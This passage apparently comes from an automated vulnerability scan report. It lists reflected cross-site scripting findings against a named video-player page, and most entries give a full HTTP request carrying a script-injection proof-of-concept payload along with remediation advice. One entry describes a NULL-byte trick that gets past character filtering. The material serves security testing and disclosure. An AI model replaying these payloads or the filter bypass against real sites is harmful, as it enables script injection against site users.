GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=135d54</script><script>alert(1)</script>c562e631428&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the invoke request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70425</script><script>alert(1)</script>14ace4beeb4 was submitted in the invoke parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=070425</script><script>alert(1)</script>14ace4beeb4&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the isSecure request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e26d2</script><script>alert(1)</script>afa0f2a8cbc was submitted in the isSecure parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0e26d2</script><script>alert(1)</script>afa0f2a8cbc&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the live request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca5a4</script><script>alert(1)</script>48dcf77890a was submitted in the live parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0ca5a4</script><script>alert(1)</script>48dcf77890a&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the liveBwOption request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40408</script><script>alert(1)</script>fb502458fa9 was submitted in the liveBwOption parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=340408</script><script>alert(1)</script>fb502458fa9&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the location request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60e7b</script><script>alert(1)</script>aed1b5279a6 was submitted in the location parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html60e7b</script><script>alert(1)</script>aed1b5279a6&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]... h=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html60e7b</script><script>alert(1)</script>aed1b5279a6&randId=43&os=MacOs&showOverlays=1&debug=0'+"&screenWidth="+screen.width+"&screenHeight="+screen.height); //end AC code </script> ...[SNIP]...
2.557. http://iad.bigpondvideo.com/indexInfinityPlayer.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://iad.bigpondvideo.com
Path:
/indexInfinityPlayer.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44454</script><script>alert(1)</script>1e1c9d361dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?44454</script><script>alert(1)</script>1e1c9d361dc=1 HTTP/1.1 Host: iad.bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 02:49:53 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 7279
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]... 'pluginspage','http://www.macromedia.com/go/getflashplayer', 'wmode','transparent' , 'flashvars','randFlashId=&platform=Production&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&44454</script><script>alert(1)</script>1e1c9d361dc=1&fullScreen=1&showOverlays=1&wmv=1&debug=0'+"&screenWidth="+screen.width+"&screenHeight="+screen.height); //end AC code </script> ...[SNIP]...
The value of the os request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6ee7</script><script>alert(1)</script>e83ff9c6a5e was submitted in the os parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOsc6ee7</script><script>alert(1)</script>e83ff9c6a5e HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the os request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 525ff</script><script>alert(1)</script>b2ad6f2e1ef was submitted in the os parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs525ff</script><script>alert(1)</script>b2ad6f2e1ef HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the phpSessionId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 757ba</script><script>alert(1)</script>ff7169f68fb was submitted in the phpSessionId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a757ba</script><script>alert(1)</script>ff7169f68fb&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the platformId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91973</script><script>alert(1)</script>34f3d3765b4 was submitted in the platformId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=191973</script><script>alert(1)</script>34f3d3765b4&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the propertyId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %001e6f1</script><script>alert(1)</script>998804cba3 was submitted in the propertyId parameter. This input was echoed as 1e6f1</script><script>alert(1)</script>998804cba3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51%001e6f1</script><script>alert(1)</script>998804cba3&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the radio request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e507</script><script>alert(1)</script>eb57accf720 was submitted in the radio parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=04e507</script><script>alert(1)</script>eb57accf720&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the randId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d54cb</script><script>alert(1)</script>df45374e90f was submitted in the randId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43d54cb</script><script>alert(1)</script>df45374e90f&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the showBw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2f91</script><script>alert(1)</script>df1a7fa6990 was submitted in the showBw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1c2f91</script><script>alert(1)</script>df1a7fa6990&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the showBw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7286f</script><script>alert(1)</script>ec6882bd4c8 was submitted in the showBw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
